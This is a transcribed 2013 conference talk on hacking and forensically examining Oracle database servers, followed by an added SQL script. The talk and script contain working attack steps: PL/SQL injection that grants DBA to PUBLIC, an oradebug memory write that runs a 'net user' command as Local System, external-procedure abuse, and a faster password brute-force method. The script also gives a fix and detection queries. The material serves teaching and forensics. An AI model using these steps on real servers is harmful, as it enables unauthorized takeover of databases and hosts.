Hacking and Forensicating an Oracle Database Server

Video in TIB AV-Portal: Hacking and Forensicating an Oracle Database Server

Formal Metadata

Title
Hacking and Forensicating an Oracle Database Server
Author
David Litchfield
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date
2013
Language
English

Content Metadata

Abstract
David Litchfield is recognized as one of the world's leading authorities on database security. He is the author of Oracle Forensics, the Oracle Hacker's Handbook, the Database Hacker's Handbook and SQL Server Security and is the co-author of the Shellcoder's Handbook. He is a regular speaker at a number of computer security conferences and has delivered lectures to the National Security Agency, the UK's Security Service, GCHQ and the Bundesamt für Sicherheit in der Informationstechnik in Germany.
thanks very much for coming to this talk we are going to be looking at hacking and forensic ating an Oracle database server although i just gave this talk at a black cat and I had an hour and a half to do I've just found out I've got 50 minutes so I've had to like slice some of the talk so I think the boring forensic side can go in the hacking side is the fun part especially for this audience so we'll concentrate on that so who am i if you're wondering who I am
I'm a vulnerability researcher I started out in buffer overflow exploitation the last bit of work I i did that I'm really proud of was back in 2003 that was definitely stack-based protection built into windows 2003 server I then started moving into database security if anyone remembers the sequel slammer worm I was partly responsible for that unfortunately and when Oracle turned around said their products were unbreakable I laughed a little bit and did some research and proved it wasn't unbreakable by any stretch of the imagination so I've been concentrating on the CNE side of things or had been up until about 2007 2008 and started looking to the forensic side because obviously it was so trivial to break into database servers and continue to this day to be trivial to break into database servers read Oracle the the whole idea of well if someone is breaking in how do we find out what they did when they got there and what we can do to you know work out what we can do to prevent them from doing this the same thing so that led on to the forensic side I recently well recently a couple years ago I solved my company so I get to do free stuff now I have no commercial presses which is great so everything presented here is all the white papers are free or the the tools which I probably won't have time for but you can go to the verity website and download them they're all free there's there's no commercial version of it or anything like that so yeah if you want to follow my research I can be found on d-lish field on Twitter or email me at david at verity calm that with a 3 ferny
so database breaches are common that's much as a given these days you I don't think I need to convince many people here that databases are whether the goodies are at I recently did a survey on the Oracle L mailing list which is like for dbas and programmers and stuff like that it's a fairly good list and I asked who's doing checks on their logs you know like security logs and so on and only one third of dba's are actually checking their stuff and most of those using grip and I find that astonishing because let's face it greps not going to work on you know binary based you know bespoke custom file formats that most databases have forensics seems to be this old date based forensics specifically seems to be this no-man's land where the incident response people are saying well you know I understand the IR stuff really well like analyzing hard drives and so on but databases well that's this whole other extra stuff I need to learn and right now i'm working with too many other cases and the database guys like whoa i know all about how to like improve the speed of a database and and so on but when it comes to ir stuff yeah that's that's way over my head i'll stick to the stuff i know so there's this seems to be this no-man's land where no one seems to be doing any work and as a consequence it's like behind it lags behind on the forensics front so getting to the good
stuff compromising the database so in a typical day based compromise there are several stages first off there's gaining access obviously once they've managed to gain access they obviously then need to elevate privileges if they want to have full control over that database server once they've got the privileges the requisite proves is privileges to do whatever they want they might want to modify data they might want to exfiltrate data there's a whole number of things that they want to do and thereafter they might want to use that database server as a staging platform to attack the rest of the network you know so that might include breaking out the database to run operating system commands and then download their toolkits and so on so we'll look at each of these sections individually okay so
I've been playing with Oracle for 10 years give or give take a year or so and yeah it was started when Larry Ellison announced that his conference that Oracle was unbreakable and you know that you say that to a hacker and that's like a red bull to a red bull to a flag a red flag to a bull and I was drinking red bull earlier and I think that's why I'm speaking so fast as well and I've got red borough in the brain not red flags so yeah the my brother and I did quite a bit of research and Mark found my brother mark found a really interesting floor and this is a remember an e al 4 plus certified products under the common criteria and Mark van der floor basically where if you entered an overly long username there was a stack-based buffer overflow which was trivial to exploit so a product which under the common criteria is supposedly secure you know it could could in the authentication mechanism alone be trivially compromised and of course that wasn't the only floor there's a there were a number of issues buffer overflows and the TNS listener I'll explain in a minute in fact let's explain what the TNS listener is okay so you have the Oracle database server the first port of call a client connects to is the TNS listener the tienes listener is responsible for communication on the Oracle database server this is really is concerned by the way I can't see anyone's faces you know so also can see these bright lights so but anyway the the the TNS listener is responsible for communication so when a client connects to the TNS listener it hands off the connection to the Oracle database process and communication takes place there after now Bettina's listener itself has had a number of buffer overflows it in the past so again without a user ID and password an attacker can exploit these two trivially gain control but a much more interesting attack one that doesn't require exploitation of buffer overflows was a thing known as external procedures exploitation X prod so I'll go into to 
that very very quickly so let's say you're using the database normally and you want to execute PL SQL code PL SQL code is like the the way you extend the Oracle database server and can like execute stuff that basically allows business logic to take place in and so on now let's say pl/sql which is you know a fairly substantial language doesn't do what you require it to do what you can do is write a we see program a we see library and hook that into the database server by using external procedures now what happens is once we you know compile our library we then tell the database server about it by doing out create library statement and we wrap that library within a procedure basically which then caused the the function within that library now what happens is the Oracle process connects back to the TNS listener and says will you load this library execute this function and pass it these parameters and the tennis lesson goes well you know I won't do it for you but I'll tell you what I know a program that will and that launches this program called X proc and tells the Oracle process to connect to X proc and X re the the Oracle database process then says 2x bog load this library execute this function and pass it these parameters and xbox goes in and does that for it now normally this happens over named pipes but it turns out that you can use TCP as well which is great because me on the other side of the Internet can connect to a TNS listener providing of course the firewall allows access and there are on firewalled Oracle servers out there and say to thee to the TNS listener I'm the Oracle process wink wink nudge nudge will you load this library for me and the TNS listener sends back mere message over TCP and says no but if you connect to this port xpac will do it for you so I then connect to that TCP port that xbox is now listen on and then I said to xbox hey do me a favor will you load this library execute this function and pass at these parameters and X prop goes yeah 
no worries then there you go without a user ID and password we can load any library we want execute any functional parts at any parameters so of course we could use load msvcrt.dll the microsoft visual c runtime and execute the system function or if it's a UNIX system we could call lipsy and do exactly the same thing so we now a running code as the user account that Oracle runs under so on Windows that's going to be local system or Linux it's going to be the oracle user by the way as far as the database is concerned you are God so Oracle fix that and it's a really funny yeah it is actually funny fix we're buying they said okay what we're going to do now is limit where you can load load libraries from and any attempt to load a library outside of the the designated place will log that just so you know there's some forensics information there and they did that by using sprint f2 to pass the library name into a stack-based buffer and anyone who programs and see here and and with a fixed size buffer on the stack without any length checking done you immediately know well sprint f is
going to lead to a stack-based buffer overflow vulnerability so even though they limited the library that where the library could be loaded from all's I needed to do to to regain control without user ID and password was exploit this new buffer overflow in the logging process so Oracle we were informed about of that and they they fixed it by putting a length check before calling sprint f why they didn't call SN printf I don't know but they decided to remain with the sprint f now it turns out that any environment variable names within the library named are expanded but that's expanded after the length check now so if i go dollar path and let's face it a path is maybe 200 500 characters or something like that suddenly we get to exploit this buffer overflow again just by going down a path dollar part dollar path we find the sweet spot because let's to be honest the path might be different on one system against another system but when we find that sweet spot where you know the communication is just reset because you know the xpac dies we can then move backwards byte by byte by byte overwrite the save return address and we have an expression in the UK Bob's your uncle I don't know if you've got it over here Bob's your uncle you own the process again so yeah the thing is even to this day if you are local to an Oracle database server in other words let's say you've got SSH access if your local you can still do this trick locally to get code to run in someone else so 10 years after the fact we can still do this up oh and incidentally of course fut LT CP is available once we're connected to the database server as a low privileged user we can use utl tcp to create the right packets and because we're now suddenly local so from the Oracle process we are communicating directly with the listener and ex Brock so again we can still affect this kind of attack and today Oracle is still vulnerable to this kind of thing now one would think that dropping msvcrt.dll in the directory 
where oracle allows you to load libraries from is a bad idea right well guess what's in there you know it should be in the windows system32 directory but for some reason they thought well we don't want it in there as well we sorry we we need it in the oracle home directory in the bin directory it's like so they make all these fixes to prevent you from calling the system function in msvcrt.dll but they go ahead and then dump the dll in the same directory so it's all for naught so I really don't understand what kind of security questions are being asked at that organization like we're about to do this is a good idea if not let's not do it and find another solution that's the minimum kind of security question that should be going on and it's clearly not going on as far as I'm concerned so anyway there's a whole bunch of ways that we can use to to gain access without a user ID and password and of course Oracle is one of these great database servers that has depending upon the applications you install a number of default accounts with default user IDs and passwords installed now this has changed obviously in in 10g you now have to set username and password sorry the password for the key account sists this man DB an SMP and sorry sis sis man system DB an SMP during the install process whilst you're installing node the default passwords are in place so sis has a passwords of change on install by default but during the installation of the Oracle server the password is still change on install so if you can find someone installing Oracle at that particular moment you can obviously still connectors assists with the password of change on install and do you know fairy stuff whilst the service being installed obviously you have to hit the the moment right it to be fair it's probably never going to happen in the real world it's just one of those things you observe in the background but there's a whole bunch of accounts out there that a typically locked but still have a default 
password in place and the you'll find in the wild there are instances of servers out there with a you know dbsnp still with its DBN SMP password ctxs still has its password of ctxs in fact there are about six to seven hundred accounts depending upon what products have been installed with default user names and passwords so even if you can't exploit any buffer overflows trying a username with its the username as its password is a good guess and so yeah there's a whole number of weak passwords and account compromises available and if we have access to the file system what you'll find is that the passwords are often logged they're encrypted but they can be decrypted because we know what the keys are that the on the file system there are certain log files where we can snap the passwords out so again if and their world readable of course as well and so yeah even if we don't have a user ID and password and we have local access to the box we can still gain access by snuffing these passwords and of course if we're dealing with a web-based application then we can just piggyback if it's vulnerable to sequel injection we can just piggyback the whole you know account authorization processes sorry authentication process is handed handled for us by the application so we just piggyback out our sequel injection of the back of it okay so assuming we get access let's I'm just going to create an
account and create use a DEFCON identified by password mmm great quit grant so I'm going to give this DEFCON user a grant crate session rather to DEFCON the only privilege required to connect to the database server is create session I'm then going to connect as this guy I create a DEFCON password okay so this is the account we're going to use to to run out and nefarious stuff select star from session principal see that's all he's gone okay crate session so basically this user the own privilege he's being granted directly is the create session privilege so he can connect to the database server and he can't do anything himself from here on in but there's a special user account called public which means everyone on the database server essentially so whatever public can do DEFCON user can do as well now I spoke about PL sequel
earlier on it when I was referencing external procedures the default security mechanism for executing pl/sql objects such as procedures packages and functions and so on is the definers privileges are used to execute the the object so if the cyst user creates a PR sequel package he's the definer any vulnerabilities in that as the definer will execute with sis privileges that's the default you can also specify using the auth ID keyword the current users privileges should be used but by default it's the definers privileges so any package which is is owned by a highly privileged user and is vulnerable to PL sequel injection can be abused by an attacker to gain full control I'm not for controlled its fate it depends on who owns the package but in the case of sis sis has all the privileges that's required so yeah if it's owns a a vulnerable package then an attacker with the only create certain privileges can exploit this floor to gain full control of the database server now Oracle has probably had about three to four hundred such issues found in sis own packages so we're not just talking about a one and two case scenario kind of thing this is the Achilles floor in the Oracle database server and continues to be so every three months Oracle release is a critical patch update sometimes they fix five critical flaws sometimes 20 to 30 critical flaws more often than not there are at least one or two if not more PL sequel injection vulnerabilities in Oracle so I'm going to show you a fake one because I don't want to put you know yeah i'm just going to show you one that i made so if you want real ones look at the critical patch update from the last time or if you want a brand spanking new one wait for the next one two critical patch update to come out there there to a penny these kind of flaws so we would as an attacker let's say remember we only have the crate server session privileges if we wanted to do things like delete the audit trail we also need the privileges to do that 
we can use these sequel injection floors in high privileged packages to do things like that or we might alternatively just say grant ourselves DBA now that would be a very noisy thing to do obviously in a real-world attack and you probably want wouldn't want to do that so what you you might find is people inserting directly into the sis off table which essentially does the same thing as the DDL statement for grant DBA but it uses an insert instead to grant those privileges and in even then you probably all of this kind of stuff is making noise and in probably won't be done but for the sake of argument it's a nice demonstration here so let's do it so there was a nice
little attack previously, or a way of facilitating an attack, where we could generate our own cursor that we would pass our nefarious SQL to, and we would inject the DBMS_SQL.EXECUTE function into the vulnerable procedure, and that would go ahead and execute with the high privileges. So whatever SQL we passed, be it GRANT DBA, would execute with the higher privileges. But Oracle went ahead and fixed that, so what we need now is another way of running arbitrary SQL.

With Microsoft SQL Server you can batch SQL statements, so you can do a SELECT, then an INSERT, then a GRANT and a CREATE, whatever you want, one after the other, in any kind of SQL injection situation. With Oracle you can't batch statements. So if we wanted to say something like GRANT DBA TO PUBLIC and it's in the middle of a SELECT statement, that's... you know, where it's vulnerable... actually, let's talk about that quickly.

Here's the sample that we're going to use. Can everyone see that at the back? Is the font big enough? Yeah, it should be. So all we're doing is: the procedure, owned by SYS in this case, I've called vulnproc, and it takes the user input, str, and concatenates it into this query, SELECT object_name FROM all_objects WHERE owner = the user input, and then executes that query. Now this here is an example of PL/SQL injection, but because it's a SELECT statement we're injecting into, we would be limited, without an additional hack, to doing another SELECT, like a UNION SELECT or something like that, and that doesn't get us DBA privileges. So what we need to do is work out another way of doing that.

So we have our auxiliary inject function; in this case it's the NEWCONTEXT function in the DBMS_XMLQUERY package. Now what this does is basically take an SQL query, such as SELECT * FROM dual, and execute it, but it doesn't have to be a SELECT statement, it could be a GRANT DBA statement, which I'll show you in a second once I finish. I've just freshly started the Oracle database service so things need to load into memory. Right, great, that's it done, and that returns very well.

So now we're going to use this to exploit the flaw. Let me put this in front of that. Before doing that, let me show you it's vulnerable to SQL injection. So we're going to execute foo; that's how you'd actually execute it normally. So what would happen is foo would be placed into str and the query would execute. If I put a single quote in there, we see "SQL command not properly ended", so that's indicative of a SQL injection flaw. Go minus minus, and, you know, that minus minus comment chops off the rest of the statement, and yes, so we're all good there. So now we can go ahead and exploit that to gain... did you... sorry, I thought someone said something behind me at the back, or there's a ghost or something. Lost my train of thought. Right, if I do SET ROLE DBA first off, you'll see we've not been given the DBA role: "role DBA not granted or does not exist". So now we're going to gain DBA privileges.

So what we've done there is injected... this is our little trick, by the way. Remember I said if we're in a SELECT statement we can't do anything other than a UNION SELECT or whatever, or a subselect? Well, this DECLARE PRAGMA AUTONOMOUS_TRANSACTION basically tells the PL/SQL compiler, this query is fine to execute on its own, it's its own transaction, you know, go ahead, everything will be safe. Now, as a consequence, we can execute arbitrary PL/SQL, and in this case it's BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC', and we end that, and we get the message that it successfully completed. So if we do SET ROLE DBA now, the DBA role has been set, and if we do SELECT * FROM session_privs... honestly, it's so easy to break into Oracle you don't need to applaud me on that, you know, it's like SELECT * FROM session..., but thank you, it is appreciated. I'm here all week, try the steak. So we've now got all these session privileges. So we've gone from CREATE SESSION only, through to exploiting a PL/SQL injection flaw, of which there are three to four hundred depending upon the version of Oracle that you're looking at, and suddenly we are God as far as the database is concerned.

So now I'm going to do ALTER USER SYS IDENTIFIED BY password, so I'm now changing the password for the SYS user, and as you'll see in a minute, logging in as SYS is going to give us some fun stuff. CONNECT sys/password@orcl AS SYSDBA. Okay, so we're now connected as the SYS user. We're going to start playing with a thing called oradebug, which is a nice little facility that allows us to read from the Oracle process memory, write to the Oracle process memory, and also execute arbitrary functions and so on. So let's... before we do that, yeah.
Breaking out of the database. How are we doing for time? We're doing okay, great. Breaking out of the database, running object code: well, obviously, if there are buffer overflows... and again, maybe each CPU has one buffer overflow, sometimes there's zero buffer overflows being fixed, but actually I think there's at least one, or more, being fixed in every Critical Patch Update; sometimes there's lots, sometimes they get a slew of flaws coming in. But we're specifically going to look at the oradebug stuff now. What oradebug does is basically, as I said, allow us to peek and poke at memory. Oradebug has been documented before, by the way, so this is nothing new; people have been speaking about using oradebug as a hacking facility for a long, long time, so this isn't like zero-day dropping by any stretch of the imagination. So if I do oradebug help, here's the help options. Some of them are very interesting, some of them are not so interesting, but we are going to be looking at these: peek and poke, and call, which basically takes a function name and you can call that function. So here's one I made earlier. Okay, so first off we need to set the process ID we want to debug, and we're just going to use the process ID of my own process, so setmypid.

So one of the great things about oradebug... well, let me rephrase that: it's bad that we can do this with oradebug, but one of the good things thereafter is, any time you use oradebug a trace file is created. cd ... actually, findstr /i oradebug *.trc ... okay, I just want to find the current one ... 628, okay, so this is our current one. Right, so we can see, remember the first oradebug command I issued was help; that's written to this trace file, and then I did setmypid and so on; that's written to the trace file. So any time you use oradebug it's being written to a trace file, which is great when it comes to forensics.

So what we're going to do here is run an operating system command, because remember, on Windows Oracle runs as the Local System user, so any arbitrary code I execute is going to execute with the privileges of the Local System user. In this case I'm going to create a user account called orahack with a password of PWD and add it, and I'm going to call the system function. So what I'm going to do first is write to this memory address four bytes, which is n, e, t, space, so that's the "net " part of the net user command, and so all this here is basically "net user orahack PWD /add", and I'm going to write that into memory, and you can see here I increment the address by 4, because if I didn't do that obviously we'd just overwrite the same bit of memory. So what you'll see here... and so, clear the screen... oh, don't do that to me. Right, give me two secs, because I restarted the system the memory's gone, so I'm just going to fudge one. We can do this, by the way, again using oradebug: we can dump a stack trace and then, using UTL_FILE, we can read that in, but I'm just going to cheat because that takes a wee bit longer. 3 4 3 17 ... dump ... 372, okay, pick one at random. Okay, we don't need execute/read/write, we just need read/write. Okay, reserved, that will do. Right, 1e23 ... edit, find, replace, 1ddf ... replace all, okay, home, and Ctrl-C. Right, let's try this again. Okay, great, so what we've done there is written the "net " part, so let's add the rest of it. So I now have written in memory "net user orahack PWD /add"; that's the operating system command I want to execute. Now I basically call the system function here and pass to it the address at which the operating system command, the net user add stuff, can be found. So before I do that, if I go net user ... we can see I've got a VM user, Administrator, David and Guest; there's no orahack account right now, but I'm going to get Oracle to now create the user by calling the system function. The function returned 0, as it should do, so net user now shows us we've got this orahack account in there. So thank you.

So what we've done is, from a lowly CREATE SESSION privileged user account, jump privileges to DBA, change the SYS password, and now we're connected as SYS; we can then start poking and peeking into memory and running arbitrary functions. Now, of course, we're only limited by our imagination in terms of what we want to do as far as executing arbitrary code is concerned: we could use this to shell back a shell, or send us back a reverse shell, or anything we want, which obviously needs us to create the right structures in memory, get the right addresses and send them to the function, basically. And one of the great things, of course, is when you call a function the return value, whatever EAX is, is returned, and EAX is basically dumped in here. So if we, say, call the socket function we can get the socket handle by looking at whatever the function returns, and so on, in there, okay, and then we can add the N and so on.

But I think the key takeaway from there is: every time you use oradebug, it's in that trace file. So what we can do is look in that trace file; did you... you can see the stuff I've written to memory, I can now extract, and then as a forensic investigator I can go ahead and start working out what the attacker attempted to do. So if they were indeed trying to spawn a reverse shell or something like that, their code is going to be in memory... not in memory, in this trace file, so we can build up a very good picture; anything they're doing is in there. But you do have to remember, of course, that we're connected as SYS, and as far as the database is concerned we are God, so if we wanted to we could delete that trace file. Suffice it to say, though, if they don't delete the trace file it's a wonderful source of information. Right, and of course we can
run operating system commands in other ways; we spoke about external procedures earlier. Let's do that. First off I'm going to do one that will fail, and the reason I'm doing that is because I want to show you another useful bit of information. Remember I said the name of the library is logged? That's actually running properly in the background right now, because I've just specified msvcrt.dll; I haven't specified a path or anything like that, so it will look through the system path for the right DLL and decide that it's not in the right location, it's not in the Oracle home, so we'll get a message being logged saying that it's an invalid DLL path. So remember I said you have to wrap it; this bit of code at the bottom wraps the call. So let's create that, and remember that this is going to fail when I execute the function, and we'll get the invalid DLL path. But if we look here, where did it create it... and there we go, now we've got two. Okay, we can see in there someone trying to load msvcrt.dll, and it was SYS, and the library name was this, and everything like that. So again, useful forensic information, worth looking at that directory.

But let's make it work now. Remember I said they dropped msvcrt.dll in the bin directory in the Oracle home, so we can now go ahead and recreate that. If I do net user we've got the orahack user; we're now going to create orahack2 with the password, so we get that "completed successfully", and that user... we've now got the orahack2 user in there, and so on.

So dropping msvcrt.dll in there wasn't a smart idea, but to be fair, if you think about it, watch this: cd .. , cd ..., cd bin. Okay, this is the Oracle home directory. That's all attack surface, you know, these are in there by default, any function in there we can obviously call, and if there's anything susceptible to things like overflows or whatever, then we can still use this external library thing. What Oracle should do is have an area where there are no DLLs by default, there are no code objects by default, and if you want to add your own stuff you can put it in there. Having it as the Oracle home is too lax as far as I'm concerned. So yeah, all of this is attack surface, basically, from an external procedure point of view, so yeah, it should be tightened up considerably. How are we doing for time? Okay.
Okay, so I've really run through the hacking side of things, so we've got a couple more minutes left for a wee bit of the forensic side. So the database has been breached, and what do we do now, where is the evidence? With Oracle the evidence is everywhere; it's great, there's so much redundancy built into the Oracle database server. It's wonderful... security, not so wonderful. If we look at Microsoft SQL Server, SQL Server 2005 I think has had three critical patches required since 2005, so that's pushing six years and it's had three critical patches. Microsoft SQL Server 2008 I think is at zero. If we look at Oracle, you know, every three months patches are coming out, time and time again; as I said, sometimes they're patching up to 20 to 30 issues, sometimes it's only five or six, but every three months... well, you have to worry about Oracle security all the time, but every three months it's patch day. But SQL Server is pretty crap when it comes to logging stuff that's useful to an investigator. Obviously you've got the transaction log and you've got the error log file, but as far as useful information goes, that's pretty much it. Oracle, it's great, it's wonderful. So let's look at some of these locations.

So obviously the system metadata itself, the information that makes up the database server, is a wonderful source of information. The data files: when a record is updated or deleted the data is left intact. Each row of data has a three-byte header... how are we doing? Okay, go on... each row of data has a three-byte header. The first byte of that three-byte header has its flags, basically, and the fifth bit: if you flip that bit it says it's deleted, if you flip it again it says it's not deleted. Okay, so we can very, very quickly find deleted data by looking at that first byte of the three-byte header to see if the bit is set or unset, and whether it's deleted or not. So if you delete data, if you think, I'm hiding my tracks, I've deleted all my stuff and everything like that, it's still in there, it's just that bit's been flipped. Or if you update data, that bit is flipped and a new row is created. So it's really useful when it comes to that information.

There's a thing called Active Session History. I wrote a couple of papers on this a few years ago. So what Active Session History is: when the Oracle server is running there's a subprocess running in the background, basically polling the database server every three seconds to find out what's going on at that particular time. It takes a snapshot; these snapshots are recorded in memory, and then every half hour or so one in ten of the snapshots are recorded on disk, basically. So if you have a query that lasts for, say, three seconds, you're going to have a snapshot of it, definitely in memory somewhere; if the query lasts for more than 30 seconds, chances are there's going to be a snapshot written to disk. So this Active Session History becomes a really useful source of information for looking at select attacks. Select attacks obviously are just, you know, getting access to data; so if you are downloading a customer database that, say, has five million records, that's going to take longer than 30 seconds, probably. If you're using something like UTL_HTTP or UTL_INADDR to exfiltrate data over an out-of-band method across the network, that's going to take a long time, and so these SQL statements will be logged in the Active Session History, and as a forensic investigator we can go back and look for evidence of even select attacks.

The transaction logs, like the redo logs in Oracle: anything that requires a transaction is logged in the redo log, so that's another great source of information. That's things like deletes, inserts, updates, select for updates, any DDL like grants, creates and drops, and so on; all that information can be found in the transaction logs. Undo segments: if you make a change, an undo segment is created that has information pertaining to that change, so again we can query that. The memory itself: in a live response situation we can start querying certain key virtual views for information. One of them is V$SQL; it has about three to five thousand of the most recent queries that have been executed, so if we can find an attack in progress, or an attack which happened just, like, half an hour ago on a fairly quiet database server, there might be evidence of attacks in there. V$DB_OBJECT_CACHE is another great source of information. So again, a couple of years ago I wrote a paper on hacking the Java Virtual Machine built into Oracle, and looking through the source code of the default Java objects, there's this util Wrapper that basically takes user input and passes it to the system function, basically. There is no reference to this util Wrapper anywhere else in the Oracle code, and I think it's left over there from development days, so no real-world code should be using it. So if it exists in this DB object cache, one can infer from that that an attack has probably taken place. So again, these virtual tables are a wonderful source of information.

And obviously the log files themselves, like the TNS listener log file, are the first port of call; any kind of connection is going to be logged in there. Caveat emptor, though, when it comes to the TNS listener log files: when a client connects they pass the program name and stuff like that, and that's all logged in the TNS listener log, but because it's under the control of the client they could say whatever they wanted; they could pretend to be a JDBC client whereas in actual fact they're a C hacking tool. So don't fully trust the information in there; use it for, like, pattern recognition and so on, perhaps. Or another one, for example: when you authenticate to Oracle, what happens is you connect to the TNS listener, the TNS listener then passes you off to the Oracle process, and you authenticate or attempt to authenticate, and if authentication fails the client tears down the connection and you start the whole process again: connect to the listener, the listener passes you off to Oracle, and so on. Now, as a consequence of the client being the one responsible for tearing down that session, if we fail authentication and we don't choose to tear down that session, we can continue to authenticate once we've got that connection to the Oracle process. So we can make one connection to the TNS listener, which passes us off to the Oracle server; we then say to the Oracle server, is the password for SYS this? And if the Oracle server says no, that's not the password, we don't tear down the connection, we just say to it, well, how's this for a password for SYS? And we keep on firing multiple attempts down the same TCP pipe, so we're not having to go through that whole setting up of the communication again. So what would typically take a minute to go through a couple of hundred passwords, we can go through a couple of hundred passwords in a second, so we speed up brute-forcing. Obviously in later versions of Oracle account locking is enabled by default, so we would just go for the SYS account, because you can't lock out that account anyway. And obviously the trace files; we looked at oradebug earlier.

I'm not going to have time to show you any of the tools and stuff. If you are interested in the tools, they're free; go to the V3rity website, download them, play with them, have fun and everything like that. So thanks for listening. Are there any questions before I disappear? I can barely see you, so if you do have a question, shout out. Okay, no questions, then great, thank you very, very much for coming.
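As an added illustration of the PL/SQL injection walk-through in the talk and of the live-response queries mentioned at the end (this is not code from the talk or from the speaker's tools), the following SQL*Plus script builds the kind of SYS-owned procedure described, exploits it with the DBMS_XMLQUERY.NEWCONTEXT plus PRAGMA AUTONOMOUS_TRANSACTION trick, shows the hardened version beside it, and then looks for the traces the attack leaves. The procedure names vulnproc and safeproc, the LIKE patterns and the 30-sample threshold are assumptions; the exploit step only works on releases where NEWCONTEXT still behaves as the talk describes, since later Critical Patch Updates closed it off.

```sql
-- Added example (not the speaker's demo code). vulnproc, safeproc and the
-- search patterns below are assumptions; DBMS_XMLQUERY.NEWCONTEXT is the
-- auxiliary inject function named in the talk and only works this way on
-- unpatched releases.

-- 1. The flaw as described: a SYS-owned definer-rights procedure that glues
--    user input straight into dynamic SQL.
CREATE OR REPLACE PROCEDURE sys.vulnproc (p_str IN VARCHAR2) AS
  TYPE t_cur IS REF CURSOR;
  l_cur  t_cur;
  l_name VARCHAR2(128);
BEGIN
  OPEN l_cur FOR
    'SELECT object_name FROM all_objects WHERE owner = ''' || p_str || '''';
  LOOP
    FETCH l_cur INTO l_name;
    EXIT WHEN l_cur%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(l_name);
  END LOOP;
  CLOSE l_cur;
END;
/
GRANT EXECUTE ON sys.vulnproc TO PUBLIC;

-- 2. Probe from a CREATE SESSION-only account: a stray quote breaks the
--    literal and Oracle reports a syntax error, the tell-tale of injection.
--    q'[...]' quoting keeps the payloads readable.
BEGIN sys.vulnproc(q'[foo']'); END;
/

-- 3. Exploit. Inside a SELECT the only thing we can append is another
--    SELECT (a UNION here). NEWCONTEXT takes a string and runs it as its
--    own statement, and PRAGMA AUTONOMOUS_TRANSACTION lets DDL run from
--    inside a query; all of it executes with SYS's privileges. TO_CHAR
--    matches the VARCHAR2 column of the original SELECT and the trailing
--    -- comments out the closing quote the procedure appends.
BEGIN
  sys.vulnproc(q'[x' UNION SELECT TO_CHAR(DBMS_XMLQUERY.NEWCONTEXT(
    'DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO PUBLIC''; END;'
  )) FROM dual--]');
END;
/
SET ROLE DBA;
SELECT * FROM session_privs;

-- 4. The fix: bind the value instead of concatenating it, and run with the
--    caller's privileges (AUTHID CURRENT_USER) so a bug cannot escalate.
--    Where an identifier has to be interpolated (a schema name cannot be
--    bound) validate it with DBMS_ASSERT.SCHEMA_NAME first.
CREATE OR REPLACE PROCEDURE sys.safeproc (p_str IN VARCHAR2)
  AUTHID CURRENT_USER AS
  TYPE t_cur IS REF CURSOR;
  l_cur  t_cur;
  l_name VARCHAR2(128);
BEGIN
  OPEN l_cur FOR
    'SELECT object_name FROM all_objects WHERE owner = :owner' USING p_str;
  LOOP
    FETCH l_cur INTO l_name;
    EXIT WHEN l_cur%NOTFOUND;
    DBMS_OUTPUT.PUT_LINE(l_name);
  END LOOP;
  CLOSE l_cur;
END;
/

-- 5. Live response as SYS: the shared pool (V$SQL) still holds the injected
--    statement, and Active Session History shows sessions that sat on one
--    SQL_ID long enough to be a bulk SELECT or an out-of-band exfiltration.
--    The sample count is a rough measure of run time (ASH samples about once
--    a second); querying the view needs the Diagnostics Pack licence.
SELECT parsing_schema_name, first_load_time, sql_text
FROM   v$sql
WHERE  UPPER(sql_text) LIKE '%AUTONOMOUS_TRANSACTION%'
   OR  UPPER(sql_text) LIKE '%DBMS_XMLQUERY.NEWCONTEXT%'
   OR  UPPER(sql_text) LIKE '%GRANT DBA%'
   OR  UPPER(sql_text) LIKE '%UTL_HTTP%';

SELECT h.session_id, u.username, h.sql_id,
       COUNT(*) AS samples, MIN(h.sample_time) AS first_seen
FROM   v$active_session_history h
JOIN   dba_users u ON u.user_id = h.user_id
GROUP  BY h.session_id, u.username, h.sql_id
HAVING COUNT(*) > 30
ORDER  BY samples DESC;
```

Run steps 1 and 4 as SYS, step 2 and 3 from the low-privileged account, and step 5 back as SYS. The V$SQL search is only useful while the statement is still in the shared pool, so on a busy instance pull AWR or the redo logs as well, as the talk recommends.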